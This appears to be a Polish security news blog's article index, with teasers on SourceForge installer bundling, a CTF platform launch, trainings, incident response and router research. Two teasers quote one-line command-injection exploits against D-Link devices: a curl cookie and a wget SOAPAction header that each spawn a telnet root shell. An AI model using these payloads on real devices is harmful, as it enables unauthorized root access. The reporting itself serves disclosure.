Niedawno naszą uwagę zwrócił dostępny od dłuższego czasu na polskim rynku LinuxMagazine – a dokładnie numer z listopada 2014 roku, gdzie można było znaleźć co najmniej 3 rozbudowane artykuły związane z ITsec.
Czytaj dalej »
Ostatnio Sourceforge przejmuje na swojej platformie konta znanych projektów. Jakiś czas temu był to GIMP (tutaj SF dodawało do instalatora GIMP-a własny ad-ware/pay-ware), parę dni temu nmap (!). Dołączają też inne znane projekty, 14-czerwca wymigrował z Sourceforge Notepad++, tłumacząc to po prostu tak: SourceForge was a good place; unfortunately, sometimes…
Czytaj dalej »
Peter Adkins umieścił na githubie swoje badania nad inteligentnym gniazdkiem elektrycznym D-Linka (DSP-W110). Nie będę jeszcze raz wszystkiego przepisywał z oryginalnego researchu ;) ale odpalenie shella wygląda tu bajecznie prosto: # Spawn a root shell (telnet) curl \ –cookie „terribleness=\`telnetd -l/bin/sh\`” \ 192.168.1.3 Podobnie wygląda historia z uploadem dowolnego…
Czytaj dalej »
Zwróciła się do nas pewna firma z prośba o pewną promocję ich inicjatywy. Z naszej strony padła propozycja organizacji konkursu na rozwal.to (swoją drogą mamy tu już prawie 900 aktywnych kont!). I mamy na to zielone światło. Pula nagród, która jest tu do wykorzystania to 2 200 PLN – które…
Czytaj dalej »
Kontynuując serię artykułów (I część znajdziesz tutaj) o defensywie zapraszam do kolejnej części. Tym razem skupię się na efektywnej Obsłudze Incydentów Bezpieczeństwa, o tym co naprawdę jest ważne i bez czego moim zdaniem nie ma mowy o skutecznym działaniu.
Czytaj dalej »
Mamy dla Was relatywnie nową propozycję szkoleniową: 2-dniowe autorskie warsztaty z obszaru technicznego monitoringu bezpieczeństwa IT. Temat wydaje się być mocno na czasie, biorąc pod uwagę choćby ostatnie doniesienia kolegów z z3s.pl. Warsztaty prowadzi Przemek Skowron, wcześniej odpowiedzialny m.in. za stworzenie zespołu CSIRT dla Grupy Alior Bank. Przemek posiada już co…
Czytaj dalej »
Już 8.06.2015 na spotkaniu WrotQA (wrocławska grupa testerów) będzie można zobaczyć naszą prezentację o bezpieczeństwie aplikacji www. Na żywo pokazanych będzie kilka nietypowych (choć krytycznych) podatności w aplikacjach webowych: m.in. niedawno zlokalizowane krytyczne błędy w Nuxeo (temat ten prezentowałem po raz pierwszy tydzień temu na konferencji Confidence). Całość pokazywana będzie…
Czytaj dalej »
Zaczynamy współpracę z Programistamag (kącik ITsec) zachęcam też do zdobycia specjalnego numeru magazynu (50 stron) z opisem ciekawych CTF-ów, przygotowany przez Dragon Sector.
Czytaj dalej »
Niedługo (22-23.06.2015) rusza w Krakowie druga edycja szkolenia: Offensive HTML, SVG, CSS and other Browser-Evil. O samym szkoleniu już pisaliśmy jakiś czas temu przy okazji pierwszej edycji tego kursu. Warto tu przypomnieć, że całość prowadzi światowej renomy badacz bezpieczeństwa – Mario Heiderich. A podsumowując – jest to propozycja przeznaczona dla…
Czytaj dalej »
Poniższy artykuł nie jest bardzo techniczny, ani teoretyczny – w zamian tego jest praktyczny. Uznałem, że może być ciekawym wprowadzeniem dla interesujących się obroną informacji lub osób, które jeszcze nie próbowały tej strony „mocy„. Jeśli jeszcze nie wiesz czy to artykuł dla Ciebie to zainwestuj kilka minut na przeczytanie go, a…
Czytaj dalej »
Prace nad rozwal.to zajęły nam więcej czasu niż się spodziewaliśmy (w sumie parę miesięcy). Dzisiaj premiera naszego serwisu CTF / hackme – czyli rozwal.to.
Czytaj dalej »
Niedawno pisaliśmy o nowych D-Linkach, a teraz pojawiło się ciekawe badanie pokazujące w jaki sposób zrealizować nieuwierzytelniony dostęp na root-a. Wystarczy jeden prosty request HTTP… wget –header=’SOAPAction: „http://purenetworks.com/HNAP1/GetDeviceSettings/`telnetd`”’ http://192.168.0.1/HNAP1 $ telnet 192.168.0.1 Trying 192.168.0.1… Connected to 192.168.0.1. Escape character is '^]’. BusyBox v1.14.1 (2015-02-11 17:15:51 CST) built-in shell (msh) Enter…
Czytaj dalej »
Nie potrzeba tu zbyt wiele komentować. Warto jednak przyznać, że oprogramowanie z tytułu notki, przy instalacji lojalnie uprzedza, że trzeba zrestartować komputer, żeby UAC wyłączył się na trwale. Ale umówmy się – kto czyta komunikaty przy instalacji oprogramowania? A co więcej, kto ze zwykłych użytkowników je rozumie? ;-) –ms
Czytaj dalej »
W naszej platformie hackme / CTF – rozwal.to – mamy już niemal wszystko: domenę, logo, grafikę, 40 pierwszych flag do zdobycia i prawie 80 użytkowników którzy obecnie biorą udział w betatestach. Obecnie cięte są grafiki a w przyszłym tygodniu będą integrowane w platformę. Za około 3 tygodnie możecie się więc…
Czytaj dalej »
Brian Krebs opisuje ciekawy przypadek 'hackowania’ bankomatu. Mimo że fizyczne ataki na tego typu urządzenia nie są niczym nowym, to jednak profesjonalni przestępcy zazwyczaj robią to bardziej wyrafinowanymi narzędziami (jak choćby palnikami). Tym razem jednak użyto tradycyjnego brute force z wykorzystaniem narzędzi typu łom czy młot: Koszt zniszczeń samych…
Czytaj dalej »